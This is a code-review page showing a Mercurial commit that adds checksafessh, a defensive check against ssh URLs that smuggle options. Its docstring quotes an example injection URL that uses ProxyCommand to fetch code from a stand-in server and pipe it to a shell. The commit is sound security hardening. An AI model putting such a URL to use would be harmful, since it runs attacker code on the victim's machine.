##// END OF EJS Templates
util: add utility method to check for bad ssh urls (SEC)...
Sean Farley -
r33723:0b3fe391 stable
parent child Browse files
Show More
@@ -2894,6 +2894,21 b' def hasdriveletter(path):'
2894 2894 def urllocalpath(path):
2895 2895 return url(path, parsequery=False, parsefragment=False).localpath()
2896 2896
2897 def checksafessh(path):
2898 """check if a path / url is a potentially unsafe ssh exploit (SEC)
2899
2900 This is a sanity check for ssh urls. ssh will parse the first item as
2901 an option; e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path.
2902 Let's prevent these potentially exploited urls entirely and warn the
2903 user.
2904
2905 Raises an error.Abort when the url is unsafe.
2906 """
2907 path = urlreq.unquote(path)
2908 if path.startswith('ssh://-') or '|' in path:
2909 raise error.Abort(_('potentially unsafe url: %r') %
2910 (path,))
2911
2897 2912 def hidepassword(u):
2898 2913 '''hide user credential in a url string'''
2899 2914 u = url(u)
General Comments 0
You need to be logged in to leave comments. Login now